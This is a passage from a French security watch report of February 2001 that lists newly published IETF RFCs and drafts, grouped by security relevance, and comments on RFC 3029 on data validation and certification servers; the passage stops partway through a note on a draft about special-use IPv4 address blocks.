Thème
POLICY
Num Date Etat Titre
3060
02/01 Pst
Policy Core Information Model -- Version 1 Specification
AUTRES RFC
Thème
BGP
DNS
IP
MGCP
MOBILEIP
MPLS
PINT
SLP
URN
LES
Num Date Etat Titre
3065
3071
3056
3064
3025
3063
3055
3059
3061
02/01
02/01
02/01
02/01
02/01
02/01
02/01
02/01
02/01
Pst
Inf
Pst
Inf
Pst
Exp
Pst
Pst
Inf
Autonomous System Confederations for BGP
Reflections on the DNS, RFC 1591, and Categories of Domains
Connection of IPv6 Domains via IPv4 Clouds
MGCP CAS Packages
Mobile IP Vendor/Organization-Specific Extensions
MPLS Loop Prevention Mechanism
Management Information Base for the PINT Services Architecture
Attribute List Extension for the Service Location Protocol
A URN Namespace of Object Identifiers
DRAFTS
Du 27/01/2001 au 23/02/2001, 288 drafts ont été publiés: 162 drafts mis à jour, 126
nouveaux drafts, dont 39 drafts ayant directement trait à la sécurité.
NOUVEAUX DRAFTS TRAITANT DE LA SÉCURITÉ
Thème
Nom du Draft
Date Titre
DIAMETER
HTTP
ICMPV6
IDWG
IPSEC
LDAPBIS
RFC2868
SECSH
SIP
SMPLS
SSH
STATE
draft-kaushik-diameter-strong-sec-00
draft-nystrom-http-sasl-00
draft-arkko-icmpv6-ike-effects-00
draft-ietf-idwg-beep-idxp-00
draft-ietf-ipsec-sctp-00
draft-ietf-ldapbis-authmeth-00
draft-zorn-rfc2868bis-00
draft-ietf-secsh-dh-group-exchange-00
draft-kroeselberg-sip-3g-security-req-00
draft-tsenevir-smpls-doi-00
draft-griffin-ssh-host-keys-in-dns-00
draft-lewis-state-of-dnssec-00
21/02
21/02
09/02
20/02
19/02
21/02
12/02
30/01
29/01
20/02
01/02
02/02
DIAMETER Strong Security Extension using Kerberos v5
SASL in http/1.1
Effects of ICMPv6 on IKE and IPsec Policies
The Intrusion Detection Exchange Protocol (IDXP)
On the Use of SCTP with IPsec
Authentication Methods for LDAPv3
RADIUS Attributes for Tunnel Protocol Support
Diffie-Hellman Group Exchange for SSH Transport Layer Protocol
SIP security requirements from 3G wireless networks
Secure MPLS Domain of Interpretation for ISAKMP
Storing SSH Host Keys in DNS
Notes from the State-Of-The-Technology: DNSSEC
MISE À JOUR DE DRAFTS TRAITANT DE LA SÉCURITÉ
Thème
Nom du Draft
Date Titre
CAT
DHC
DIAMETE
DNSEXT
draft-burdis-cat-srp-sasl-04
draft-ietf-dhc-authentication-16
draft-calhoun-diameter-strong-crypto-06
draft-ietf-dnsext-message-size-03
draft-ietf-dnsext-zone-status-05
29/01
31/01
05/02
29/01
13/02
Secure Remote Password SASL Mechanism
Authentication for DHCP Messages
DIAMETER Strong Security Extension
DNSSEC & IPv6 A6 aware server/resolver msg. size requirements
DNS Security Extension Clarification on Zone Status
Page 14/42
Février 2001
IDWG
IPSEC
ISCSI
KINK
L2TPEXT
LDAP
MOBILEI
OPENPGP
PKIX
PPPEXT
PROBABI
RADIUS
SACRED
SMIME
SMPLS
TLS
UGGC
draft-ietf-idwg-idmef-xml-03
draft-ietf-idwg-requirements-05
draft-ietf-ipsec-ike-monitor-mib-02
draft-ietf-ipsec-isakmp-di-mon-mib-03
draft-ietf-ipsec-monitor-mib-04
draft-klein-iscsi-security-01
draft-ietf-kink-reqmt-01
draft-ietf-l2tpext-security-02
draft-zeilenga-ldap-authpasswd-05
draft-ietf-mobileip-aaa-key-03
draft-ietf-openpgp-mime-04
draft-ietf-openpgp-multsig-02
draft-ietf-pkix-new-part1-04
draft-aboba-pppext-eapgss-03
draft-selcuk-probabilistic-lkh-01
draft-congdon-radius-8021x-09
draft-ietf-sacred-reqs-01
draft-ietf-smime-domsec-08
draft-ietf-smime-rcek-01
draft-tsenevir-smpls-01
draft-ietf-tls-ciphersuite-03
draft-farah-uggc-protocol-01
14/02
20/02
13/02
13/02
13/02
15/02
31/01
12/02
07/02
29/01
08/02
30/01
07/02
13/02
30/01
02/02
14/02
01/02
08/02
20/02
01/02
31/01
Intrusion Detection Message Exchange Format XML Doc. Typ Def.
Intrusion Detection Mesage Exchange Requirements
IKE Monitoring MIB
ISAKMP DOI-Independent Monitoring MIB
IPSec Monitoring MIB
iSCSI Security Protocol
Kerberized Internet Negotiation of Keys
Securing L2TP using IPSEC
LDAP Authentication Password Schema
AAA Registration Keys for Mobile IP
MIME Security with OpenPGP
Multiple Signatures using Security Multiparts
Internet X.509 PKI Certificate and CRL Profile
EAP GSS Authentication Protocol
Prob. Opt. of LKH-based Multicast Key Distribution Schemes
IEEE 802.1X RADIUS Usage Guidelines
Securely Available Credentials - Requirements
Domain Security Services using S/MIME
Reuse of CMS Content Encryption Keys
Secure MPLS - Encryption and Authentication of MPLS payloads
AES Ciphersuites for TLS
Encrypted Hypertext Transfer Protocol -- UGGC/1.0
DRAFTS TRAITANT DE DOMAINES CONNEXES À LA SÉCURITÉ
Thème
Nom du Draft
AAA
draft-ietf-aaa-diameter-00
draft-ietf-aaa-diameter-accounting-00
draft-ietf-aaa-diameter-framework-00
draft-ietf-aaa-diameter-impl-guide-00
draft-ietf-aaa-diameter-mobileip-00
draft-ietf-aaa-diameter-nasreq-00
BEEP
draft-mrose-beep-design-02
BGPCON
draft-berkowitz-bgpcon-00
CARD
draft-eastlake-card-map-08
DIAMETER draft-calhoun-diameter-18
draft-calhoun-diameter-accounting-09
draft-calhoun-diameter-framework-09
draft-calhoun-diameter-impl-guide-05
draft-calhoun-diameter-mobileip-12
draft-calhoun-diameter-nasreq-06
draft-calhoun-diameter-res-mgmt-07
draft-calhoun-diameter-sun-ping-00
IDWG
draft-ietf-idwg-beep-tunnel-01
draft-ietf-idwg-iap-04
IPVPN
draft-iyer-ipvpn-infomodel-00
draft-iyer-ipvpn-infomodel-req-00
LDAP
draft-armijo-ldap-control-error-01
draft-zeilenga-ldap-cancel-01
draft-zeilenga-ldap-namedref-02
draft-zeilenga-ldap-root-02
draft-zeilenga-ldap-txn-01
LDAPBIS
draft-ietf-ldapbis-filter-00
LDAPEXT draft-ietf-ldapext-ldap-java-api-13
draft-khan-ldapext-replica-mgmt-00
LDAPV3B draft-zeilenga-ldapv3bis-opattrs-04
NATREQ4 draft-huitema-natreq4ipv6-00
draft-huitema-natreq4udp-00
PERSONA draft-bryden-personal-content-tunnels-00
PPVPN
draft-hummel-ppvpn-tunnel-systems-00
SYSLOG
draft-ietf-syslog-reliable-04
draft-ietf-syslog-syslog-05
TRADE
draft-ietf-trade-ecml2-req-00
UDLR
draft-ietf-udlr-lltunnel-06
UMTP
draft-finlayson-umtp-05
Date Titre
09/02
09/02
09/02
09/02
09/02
09/02
20/02
29/01
15/02
05/02
05/02
05/02
05/02
05/02
05/02
05/02
07/02
19/02
20/02
19/02
19/02
08/02
07/02
07/02
12/02
12/02
21/02
05/02
30/01
07/02
19/02
19/02
15/02
13/02
08/02
16/02
14/02
08/02
21/02
Diameter Base Protocol
Diameter Accounting Extensions
Diameter Framework Document
Diameter Implementation Guidelines
Diameter Mobile IP Extensions
Diameter NASREQ Extensions
On the Design of Application Protocols
Benchmarking Methodology for Exterior Routing Convergence
ISO 7812/7816 Numbers and the Domain Name System (DNS)
DIAMETER Base Protocol
DIAMETER Accounting Extension
DIAMETER Framework Document
DIAMETER Implementation Guidelines
DIAMETER Mobile IP Extensions
DIAMETER NASREQ Extensions
DIAMETER Resource Management Extensions
Diameter Sun Ping Extensions
The TUNNEL Profile Registration
IAP: Intrusion Alert Protocol
IP VPN Policy Information Model
Requirements for an IP VPN Policy Information Model
Result Message for LDAP Controls
LDAP Cancel Extended Operation
Named Subordinate References in LDAP Directories
OpenLDAP Root Service An experimental LDAP referral service
LDAPv3 Transactions
The String Representation of LDAP Search Filters
The Java LDAP Application Program Interface
LDAP Extensions for Managing Replication Context and Replicas
LDAPv3: All Operational Attributes
Short term NAT requirements for IPv6 transition
Short term NAT req. for UDP based peer-to-peer applications
Personal Content Tunnels
Tree/Ring/Meshy VPN tunnel systems
Reliable Delivery for Syslog
syslog Protocol
Electronic Commerce Modeling Language: V2 Requirements
A Link Layer Tunneling Mechanism for Unidirectional Links
The UDP Multicast Tunneling Protocol
AUTRES DRAFTS
Thème
Nom du Draft
Date Titre
3GPP2
ADSLMIB
APEX
draft-bradner-3gpp2-collaboration-00
draft-baillie-adslmib-vdsldmt-00
draft-mrose-apex-access-01
draft-mrose-apex-core-02
draft-mrose-apex-presence-02
draft-ietf-atommib-atm2-16
19/02
19/02
13/02
20/02
20/02
13/02
ATOMMIB
3GPP2-IETF Standardization Collaboration
Definitions of Managed Objects for VDSL DMT Lines
The APEX Access Service
The Application Exchange Core
The APEX Presence Service
Definitions of Supplemental Managed Objects for ATM Interface
Page 15/42
Février 2001
draft-stewart-atommib-opticalmib-01
draft-akers-atwal-btooth-00
draft-gentric-avt-mpeg4-multisl-01
draft-ietf-avt-evrc-01
draft-ietf-avt-profile-interop-04
draft-ietf-avt-rtp-amr-04
draft-ietf-avt-rtp-interop-06
draft-ietf-avt-rtp-mp3-06
BGP
draft-chen-bgp-reference-01
BST
draft-azmak-bst-00
BURP
draft-das-burp-requirements-00
CALSCH
draft-ietf-calsch-inetcal-guide-00
CDI
draft-amini-cdi-distribution-reqs-00
CDNP
draft-cain-cdnp-known-request-routing-01
draft-penno-cdnp-nacct-userid-02
CONFORM draft-hss-conformance-test-sctp-00
DELTAV
draft-ietf-deltav-versioning-13
DHC
draft-aiello-dhc-appliance-class-00
draft-ietf-dhc-agentoptions-device-class-01
draft-ietf-dhc-leasequery-01
DIFFSER
draft-bless-diffserv-le-phb-00
draft-ietf-diffserv-2836bis-01
draft-ietf-diffserv-mib-08
draft-ietf-diffserv-model-06
draft-ietf-diffserv-pdb-ar-00
draft-ietf-diffserv-rfc2598bis-00
DISMAN
draft-bierman-disman-see-00
draft-ietf-disman-alarm-mib-00
draft-ietf-disman-itualarm-mib-00
DNS
draft-schoch-dns-ssm-00
DNSEXT
draft-macgowan-dnsext-label-intel-manage-0
DNSOP
draft-ietf-dnsop-hardie-shared-root-server-03
DSUA
draft-manning-dsua-06
E164
draft-foster-e164-gstn-npusa-01
ENUM
draft-ietf-enum-e164-gstn-np-01
FAST
draft-designteam-fast-mipv6-01
FAX
draft-ietf-fax-content-negotiation-04
draft-ietf-fax-gateway-options-01
draft-ietf-fax-gateway-protocol-03
draft-ietf-fax-implementers-guide-06
draft-ietf-fax-service-v2-02
draft-ietf-fax-timely-delivery-02
FAXWG
draft-maeda-faxwg-fax-processing-status-00
draft-maeda-faxwg-terminal-mode-goals-00
draft-maeda-faxwg-terminal-mode-protocol-0
FCIP
draft-weber-fcip-encaps-00
GLOP
draft-meyer-glop-extensions-00
GNUQUEU draft-krebs-gnuqueue-protocol-01
GRP
draft-giacalone-grp-00
HTML
draft-daviel-html-geo-tag-04
IANA
draft-albanna-iana-IPv4-mcast-guidelines-00
IDMR
draft-ietf-idmr-snoop-00
IDN
draft-ietf-idn-amc-ace-m-00
draft-ietf-idn-dnsii-mdnp-02
draft-ietf-idn-dnsii-mdnr-01
draft-ietf-idn-mua-00
IDR
draft-ietf-idr-as4bytes-01
IMAP
draft-crispin-imap-multiappend-03
draft-nerenberg-imap-binary-02
IMPP
draft-ietf-impp-cpim-msgfmt-00
INARP
draft-heinanen-inarp-uni-00
IPCDN
draft-ietf-ipcdn-dvbnetint-mib-03
draft-ietf-ipcdn-dvbniuif-mib-00
IPNGWG
draft-haberman-ipngwg-host-anycast-00
draft-ietf-ipngwg-1394-01
draft-ietf-ipngwg-addr-arch-v3-04
draft-ietf-ipngwg-rfc2553bis-03
draft-ietf-ipngwg-site-prefixes-05
IPP
draft-ietf-ipp-collection-04
draft-ietf-ipp-implementers-guide-v11-02
draft-ietf-ipp-job-printer-set-ops-03
draft-ietf-ipp-job-prog-02
draft-ietf-ipp-not-05
draft-ietf-ipp-not-spec-06
draft-ietf-ipp-url-scheme-02
IPPM
draft-ietf-ippm-ipdv-06
draft-ietf-ippm-owdp-02
ATWAL
AVT
30/01
21/02
05/02
20/02
07/02
19/02
07/02
12/02
15/02
16/02
29/01
19/02
20/02
13/02
08/02
12/02
15/02
13/02
05/02
15/02
21/02
20/02
15/02
07/02
15/02
19/02
15/02
30/01
30/01
12/02
08/02
08/02
01/02
13/02
09/02
08/02
30/01
21/02
21/02
13/02
15/02
09/02
20/02
16/02
16/02
13/02
20/02
29/01
16/02
15/02
12/02
21/02
12/02
07/02
07/02
08/02
13/02
21/02
14/02
12/02
08/02
07/02
14/02
19/02
14/02
05/02
12/02
08/02
29/01
05/02
01/02
29/01
29/01
05/02
14/02
21/02
21/02
Definitions of Managed Objects for the Optical Interface Type
Transmission of IP Packets over Bluetooth Networks
RTP Payload Format for MPEG-4 Streams
An RTP Payload Format for EVRC Speech
RTP Audio/Video Profile Interoperability Statement
RTP payload format for AMR
RTP Interoperability Statement
A More Loss-Tolerant RTP Payload Format for MP3 Audio
List of the Current BGP Documents
BST Protocol for Improved Perf. in Satellite, Wireless & Mobile Net
Basic User Registration Protocol (BURP) Requirements
Guide to Internet Calendaring
Dist. Peer. Requirements for Content Distribution Internetworking
Known CDN Request-Routing Mechanisms
User Profile Information Protocol
Conformance Test Specification for SCTP
Versioning Extensions to WebDAV
Appliance Class Identifier Option for DHCP
Addition of Device Class to Agent Options
DHCP Lease Query
A Limited Effort Per-Hop Behavior
Per Hop Behavior Identification Codes
Mgmt. Information Base for the Diff. Services Architecture
An Informal Management Model for Diffserv Routers
An Assured Rate Per-Domain Behaviour for Differentiated Services
An Expedited Forwarding PHB
Script Execution Env. Specification For Dist. Mng. Platforms
Alarm MIB
ITU Alarm MIB
Using Domain Name Services for Source Specific Multicast
DNS Label Intelligence and Management System
Dist. Root or Autho. Name Servers via Shared Unicast Addresses
Documenting Special Use IPv4 Address Blocks
Number Portability Administration in the U.S.
Number Portability in the GSTN: An Overview
Fast Handovers for Mobile IPv6
Content Negotiation for Internet Messaging Services
Guideline of optional services for Internet FAX Gateway
Internet FAX Gateway Protocol
Implementers Guide for Facsimile Using Internet Mail
A Simple Mode of Facsimile Using Internet Mail
Timely Delivery for Internet Messaging Services
Fax Processing Status
Goals for Terminal Mode
Protocol for Terminal Mode
FCIP Frame Encapsulation Enhancement Proposals
Extended Allocations in 233/8
Desc. of Load-Balancing & Comm. Protocols Used by GNU Queue
GRP for Networks Using Zero Configuration IPv4 Addresses
Geographic registration of HTML documents
IANA Guidelines for IPv4 Multicast Address Allocation
IGMPv3 and IGMP Snooping switches
AMC-ACE-M version 0.1.0
The DNSII Multilingual Domain Name Protocol
DNSII Multilingual Domain Name Resolution
Internationalizing Domain Names in Mail User Agents
BGP support for four-octet AS number space
IMAP - MULTIAPPEND EXTENSION
IMAP4 Binary Content Extension
Common Presence and Instant Messaging Message Format
Inverse ARP over Unidirectional Virtual Circuits
DVB Cable Network Interface Unit MIB for EuroModem Cable Mod.
DVB NIU Interface MIB for EuroModem compliant Cable Modems
Host-based Anycast using MLD
Transmission of IPv6 Packets over IEEE 1394 Networks
IP Version 6 Addressing Architecture
Basic Socket Interface Extensions for IPv6
Site prefixes in Neighbor Discovery
Internet Printing Protocol (IPP): The 'collection' attribute syntax
Internet Printing Protocol/1.1: Implementer's Guide
Internet Printing Protocol (IPP): Job and Printer Set Operations
Internet Printing Protocol (IPP): Job Progress Attributes
Internet Printing Protocol: Requirements for IPP Notifications
Internet Printing Protocol (IPP):IPP Event Notification Specification
Internet Printing Protocol (IPP): IPP URL Scheme
IP Packet Delay Variation Metric for IPPM
A One-way Delay Measurement Protocol
Page 16/42
Février 2001
IPS
IPTEL
IPV6
ISIS
draft-ietf-ips-ifcp-00
draft-gurbani-iptel-sip-to-in-04
draft-iesg-ipv6-addressing-recommendationsdraft-ietf-isis-diff-te-00
draft-ietf-isis-transient-00
ISSLL
draft-hamid-issll-rsvp-cap-dsmark-00
draft-ietf-issll-rsvp-cap-02
L2CIRCU
draft-martini-l2circuit-encap-mpls-01
draft-martini-l2circuit-trans-mpls-05
L2TPEXT
draft-ietf-l2tpext-link-01
draft-ietf-l2tpext-ppp-discinfo-02
draft-ietf-l2tpext-sesinfo-03
LDAPBIS
draft-zeilenga-ldapbis-vd-01
LMTP
draft-murchison-lmtp-ignorequota-00
LOW
draft-fukunaga-low-delay-rtcp-02
MANET
draft-ietf-manet-zone-brp-00
draft-ietf-manet-zone-iarp-00
draft-ietf-manet-zone-ierp-00
MANUAL
draft-arkko-manual-icmpv6-sas-00
MBONED
draft-ietf-mboned-ssm232-00
MEGACO
draft-bothwell-megaco-mftonepkgs-00
draft-boyle-megaco-tonepkgs-02
draft-cutler-megaco-mgc-cookie-00
draft-doyle-megaco-tonesmib-00
draft-manyfolks-megaco-caspackage-00
draft-rosen-megaco-atm-package-00
METRIC
draft-jaffer-metric-interchange-format-03
METRICS draft-bradner-metricstest-00
MGCP
draft-srinath-mgcp-bus-packages-01
MHTML
draft-palme-mhtml-info-00
MIDCOM
draft-ietf-midcom-framework-00
MIDDLEB draft-lear-middlebox-arch-01
MIDTAX
draft-carpenter-midtax-00
MMUSIC
draft-andreasen-mmusic-sdp-simcap-reqts-00
draft-ietf-mmusic-sdp-atm-05
draft-ietf-mmusic-sdp-comedia-00
draft-ietf-mmusic-sdpng-req-00
MORNEAU draft-jimenez-morneault-iua-test-spec-00
MPLS
draft-ietf-mpls-diff-ext-08
draft-ietf-mpls-diff-te-ext-01
draft-ietf-mpls-generalized-signaling-01
NBN
draft-hakala-nbn-01
NDMPV4
draft-skardal-ndmpv4-01
NEW
draft-farah-new-keywords-02
NGTRANS draft-ietf-ngtrans-6to4anycast-02
draft-ietf-ngtrans-6to4-multicast-00
draft-ietf-ngtrans-dstm-04
draft-ietf-ngtrans-tcpudp-relay-02
OCF
draft-bullen-ocf-00
ONG
draft-stewart-ong-sctpbakeoff-sigtran-01
OPCODE
draft-ymbk-opcode-discover-00
OSPF
draft-ietf-ospf-diff-te-00
draft-ietf-ospf-hitless-restart-00
draft-ietf-ospf-subset-flood-00
PAGING
draft-seamoby-paging-problem-statement-01
PCDP
draft-jl-pcdp-01
PEEK
draft-ranalli-peek-walter-enum-t1roles-01
PGM
draft-speakman-pgm-spec-06
PICO
draft-odoherty-pico-sip-00
PPPOE
draft-penno-pppoe-ext-service-00
PROVREG draft-ietf-provreg-dn-defn-00
draft-ietf-provreg-epp-00
draft-ietf-provreg-grrp-reqs-00
REQUIR
draft-calabrese-requir-logprot-04
RESTORA draft-bala-restoration-signaling-00
RFC1403
draft-meyer-rfc1403-historic-00
RFC1745
draft-meyer-rfc1745-historic-00
RMONMIB draft-ietf-rmonmib-dsmon-mib-04
draft-ietf-rmonmib-iftopn-mib-04
RMT
draft-koh-rmt-bb-tsm-00
ROHC
draft-ietf-rohc-rtp-08
draft-ietf-rohc-rtp-lower-layer-guidelines-01
draft-ietf-rohc-rtp-requirements-05
ROOT
draft-higgs-root-defs-00
RPC
draft-smajee-rpc-ipv6-00
SACRED
draft-ietf-sacred-scenarios-00
SEAMOBY draft-ietf-seamoby-context-transfer-problem-s
21/02
19/02
02/02
20/02
20/02
20/02
21/02
19/02
12/02
20/02
20/02
20/02
07/02
14/02
13/02
21/02
21/02
21/02
09/02
12/02
05/02
14/02
12/02
19/02
05/02
12/02
19/02
21/02
12/02
12/02
21/02
01/02
30/01
07/02
02/02
19/02
19/02
08/02
16/02
19/02
19/02
30/01
14/02
31/01
21/02
15/02
14/02
16/02
08/02
31/01
30/01
19/02
20/02
21/02
15/02
12/02
05/02
14/02
30/01
20/02
20/02
21/02
21/02
07/02
20/02
09/02
09/02
29/01
08/02
21/02
08/02
08/02
09/02
19/02
16/02
13/02
19/02
iFCP - A Protocol for Internet Fibre Channel Storage Networking
Accessing IN services from SIP networks
IAB/IESG Recommendations on IPv6 Address Allocations
Extensions to ISIS for support of Diff-Serv-aware MPLS Traffic
IS-IS Transient Blackhole Avoidance
A Usage Case for the RSVP CAP Object
Capability Negotiation: The RSVP CAP Object
Encapsulation Methods for Transport of Layer 2 Frames ov. MPLS
Transport of Layer 2 Frames Over MPLS
L2TP Link Extensions
L2TP Disconnect Cause Information
L2TP Session Information (``SESINFO'')
Lightweight Directory Access Protocol: version differences
LMTP Service Extension for Ignoring Recipient Quotas
Low Delay RTCP Feedback Format
The Bordercast Resolution Protocol (BRP) for Ad Hoc Networks
The Intrazone Routing Protocol (IARP) for Ad Hoc Networks
The Interzone Routing Protocol (IERP) for Ad Hoc Networks
Manual SA Configuration for IPv6 Link Local Messages
Source-Specific Protocol Independent Multicast in 232/8
MF Tone Generation and Detection Packages
Supplemental Tones Packages for Megaco/H.248
MGC Cookie Package for Megaco/H248
Tones MIB for Megaco/H.248
Megaco/H.248 Basic CAS Packages
Megaco ATM Package
Repres. of numerical values & SI units in character strings for inf.
Adv. of metrics specifications on the IETF Standards Track
MGCP Business Phone Packages
Sending HTML in MIME, an informational supplement to the RFC
Middlebox Communication Architecture and framework
A Middle Box Architectural Framework
Middle boxes: taxonomy and issues
SDP Simple Capability Negotiation Requirements
Conventions for the use of the Session Description Protocol …
Connection-Oriented Media Transport in SDP
Requirements for Session Description and Capability Negotiation
ISDN Q.921-User Adaptation Layer Test Specification
MPLS Support of Differentiated Services
Extensions to RSVP-TE and CR-LDP for support of Diff-Serv-aware
Generalized MPLS - Signaling Functional Description
Using National Bibliography Numbers as Uniform Resource Names
NDMP Version 4 Protocol
New meaning of Keywords for use in RFCs to Ind. Req. Levels
An anycast prefix for 6to4 relay routers
Support for Multicast over 6to4 Networks
Dual Stack Transition Mechanism (DSTM)
An IPv6-to-IPv4 transport relay translator
Open Capture Format (OCF)
SCTP Bakeoff Results and Issues
The DISCOVER opcode
Extensions to OSPF for support of Diff-Serv-aware MPLS Traffic E.
Hitless OSPF Restart
Flooding Over a Subset Topology
Paging Problem Statement
Propagated Content Delivery Protocol
Tier-1 ENUM System Roles and Responsibilities
PGM Reliable Transport Protocol
Pico SIP
PPPoE Extensions For Seamless Service Selection
Domain Name and Related Definitions
Extensible Provisioning Protocol
Generic Registry-Registrar Protocol Requirements
Requirements for a Network Event Logging Protocol
Signaling for Fast Restoration in Optical Mesh Networks
Request to Move RFC1403 to Historic Status
Request to Move RFC1745 to Historic Status
Remote Monitoring MIB Extensions for Differentiated Services
Remote Monitoring MIB Ext. for Interface Parameters Monitoring
Reliable Multicast Transport Building Blocks:Transport Session Ma.
RObust Header Compression (ROHC)
Lower Layer Guidelines for Robust RTP/UDP/IP Header Comp.
Requirements for robust IP/UDP/RTP header compression
Root Server Definitions
IPv6 extension to RPC
SACRED Scenarios
Problem Description: Reasons For Doing Context Transfers Bet.
Page 17/42
Février 2001
SGM
SIGTRAN
SIP
SMING
SONET
SPIRITS
SSM
STD39
SVRLOC
T
TDMOIP
TEL
TEST
TEWG
TRADE
UID
UOL
URI
URN
USWG
VMI
VPIM
WEBDAV
WEBI
XCAST
XHTML
XMLORG
draft-ietf-seamoby-mm-problem-00
draft-thomas-seamoby-rsvp-analysis-00
draft-boivie-sgm-02
draft-ietf-sigtran-addip-sctp-00
draft-ietf-sigtran-m2ua-07
draft-ietf-sigtran-relreq-sctp-00
draft-ietf-sigtran-srwnd-sctp-00
draft-ietf-sigtran-sua-05
draft-ietf-sigtran-usctp-01
draft-ietf-sigtran-v5ua-00
draft-campbell-sip-service-control-03
draft-ietf-sip-cc-transfer-03
draft-ietf-sip-serverfeatures-03
draft-mahy-sip-message-waiting-01
draft-peterbauer-sip-servlet-ext-00
draft-petrie-sip-config-framewk-reqs-00
draft-roach-sip-subscribe-notify-03
draft-ietf-sming-copspr-00
draft-malis-sonet-ces-mpls-02
draft-faynberg-spirits-reqs-00
draft-ietf-spirits-architecture-01
draft-ietf-spirits-reqs-00
draft-slutsman-spirits-architecture-02
draft-kim-ssm-hierarchical-scheme-00
draft-ymbk-std39-historic-01
draft-ietf-svrloc-ipv6-12
draft-itu-t-ieps-description-00
draft-anavi-tdmoip-00
draft-yu-tel-url-02
draft-hss-test-spec-m3ua-00
draft-ietf-tewg-diff-te-reqts-00
draft-ietf-trade-drt-requirements-02
draft-ietf-trade-voucher-lang-00
draft-penno-uid-01
draft-boynton-uol-03
draft-eastlake-uri-fqdn-param-00
draft-best-urn-oasis-02
draft-ietf-urn-ddds-04
draft-ietf-urn-dns-ddds-database-03
draft-ietf-urn-rfc2611bis-01
draft-ietf-urn-uri-res-ddds-03
draft-walsh-urn-publicid-00
draft-ietf-uswg-tao-03
draft-senevirathne-vmi-frame-00
draft-ietf-vpim-hint-03
draft-ietf-webdav-status-00
draft-ietf-webi-idd-reqs-00
draft-shin-xcast-receiver-join-00
draft-baker-xhtml-media-reg-01
draft-best-xmlorg-01
19/02
13/02
14/02
05/02
08/02
05/02
05/02
02/02
19/02
20/02
12/02
05/02
12/02
08/02
15/02
05/02
08/02
08/02
19/02
08/02
02/02
20/02
30/01
21/02
08/02
13/02
20/02
15/02
09/02
15/02
19/02
15/02
21/02
08/02
08/02
19/02
08/02
09/02
09/02
12/02
09/02
15/02
15/02
07/02
16/02
29/01
21/02
02/02
08/02
08/02
SeaMoby Micro Mobility Problem Statement
Analysis of Mobile IP and RSVP Interactions
Small Group Multicast
SCTP Dynamic Addition of IP addresses
SS7 MTP2-User Adaptation Layer
Generic Method for Transmitting Reliable SCTP Control Chunks
SCTP Stream based flow limiting methods
SS7 SCCP-User Adaptation Layer (SUA)
SCTP Unreliable Data Mode Extension
V5.2-User Adaption Layer (V5UA)
Control of Service Context using SIP Request-URI
SIP Call Control
The SIP Supported Header
SIP Extensions for Message Waiting Indication
SIP Servlet API Extensions
Requirements for a SIP User Agent Configuration Framework
Event Notification in SIP
SMIng Mappings to COPS-PR
SONET/SDH Circuit Emulation Service Over MPLS
SPIRITS Protocol Requirements
The SPIRITS Architecture
SPIRITS Protocol Requirements
The SPIRITS Architecture
Hierarchical Scheme for Source-Specific Multicast Deployment
Request to Move STD 39 to Historic Status
Service Location Protocol Modifications for IPv6
Recommendation E.106 (Formerly CCITT Recommendation)
TDM over IP
Extensions to the 'tel' and 'fax' URLs to Support Number Portabil.
Test Specification for MTP3 User Adaptation
Requirements for support of Diff-Serv-aware MPLS Traffic
Requirements for Generic Voucher Trading
XML Voucher: Generic Voucher Language
User Identification on the Internet
Uniform Object Locator -- UOL
Considerations for URI and FQDN Protocol Parameters
A URN Namespace for OASIS oasis
Dynamic Delegation Discovery System (DDDS)
A DDDS Database Using The Domain Name System
URN Namespace Definition Mechanisms
URI Resolution using the Dynamic Delegation Discovery System
A URN Namespace for Public Identifiers
The Tao of IETF - A Novice's Guide to the Internet Engineering
A Framework for Virtual Metropolitan Internetworks (VMI)
Message Context for Internet Mail
WebDAV -- Advanced Status Reporting
Requirements for Intermediary Discovery and Description
Explicit Multicast Extension Supporting Receiver Initiated Join
The 'application/xhtml+xml' Media Type
A URN Namespace for XML.org xmlorg
Page 18/42
Février 2001
NOS COMMENTAIRES
LES RFC
RFC 3029
Internet X.509 Public Key Infrastructure Data Validation and Certification Server Protocols
Ce standard IETF de 50 pages décrit une implémentation (objets ASN1 et protocole) de type 'TTP'* (Trusted Third
Party) dénommé 'DVCS' ou 'Data Validation and Certification Server'.
Un tel système permet d'assurer un service dit de 'non-répudiation' , voire de 'notarisation' permettant de
prouver la possession d'une donnée numérique à la date mentionnée dans un certificat remis par le système, et ici
dénommé DVC ou 'Data Validation Certificate'.
Rappelons que les infrastructures de service 'TTP' ont fait l'objet de nombreuses études au début des années 90 et
peuvent être implémentées selon deux modèles:
Modèle du Tiers en Ligne:
le tiers joue le rôle d'intermédiaire dans une transaction en apposant sa
signature horodatée sur les données reçues, données elles-mêmes signées par l'émetteur. Cette signature (et
selon le contexte, les données associées) est archivée puis transmise si nécessaire à l'émetteur et au(x)
destinataire(s). Le service 'LettreRecommandée' présenté dans notre rapport de veille N°30 du mois de Janvier
2001 s'inscrit dans ce modèle. Ce modèle était celui retenu par le service de notarisation Veridial proposé par
la société Transpac dans la fin des années 80.
Modèle du Tiers hors Ligne: dans ce modèle, le tiers se place en dehors de la transaction et appose sa
signature horodatée sur demande explicite du client. Ce modèle était celui retenu par le service de notarisation
Cerdial proposé par la société Transpac au milieu des années 90.
Ici, le RFC 3029 référence un modèle de type ' Tiers hors ligne ' pour lequel deux protocoles d'accès et de
soumission, utilisant tous les deux l'objet MIME 'Content-Type application/dvcs', sont plus spécialement
détaillés: Messagerie Internet via Smtp et WEB via HTTP/HTTPS.
Ce document a pour particularité de s'inscrire, une fois n'est pas coutume, dans le courant de normalisation
Européen: co-édité par 2 sociétés spécialisées dans les PKI (Entrust et Baltimore), par une société Française (OnX/EdelWeb), validé par l'un des spécialistes français de X509, Denis Pinkas (Bull) et référençant en annexe la
norme ISO 10181-5 'SecurityFramework in Open Systems: Non-Repudation Framework'.
D'un lecture ardue, ce RFC reste intéressant car traitant au niveau d'un standard Internet, donc avec une forte
audience, une problématique quelque peu oubliée des grands fournisseurs de service et pourtant absolument
nécessaire comme rappelée en 1999 dans le rapport Lorentz.
* TTP: Terminologie traduite en 'Tiers de Confiance' à prendre au sens large du terme et non de celui, trop restrictif, usité en
France à la suite de l'ouverture de la législation sur la Cryptographie. Ici, un TTP offre un service de délivrance, d'enregistrement
de preuve, éventuellement de dépôt sécurisé, et non uniquement de conservation des clefs de chiffrement, fonction désignée
outre-Atlantique sous la terminologie de 'Key Escrow'.
ftp://ftp.isi.edu/in-notes/rfc3029.txt
LES DRAFTS
DRAFT-MANNING-DSUA-06
Documenting Special Use IPv4 Address Blocks
Ce document de synthèse présentant la spécificité de certaines plages d'adresse IP avait été retiré des archives et
de la liste des drafts, le délai de validité de 6 mois ayant été dépassé. Ce problème d'accessibilité d'un document
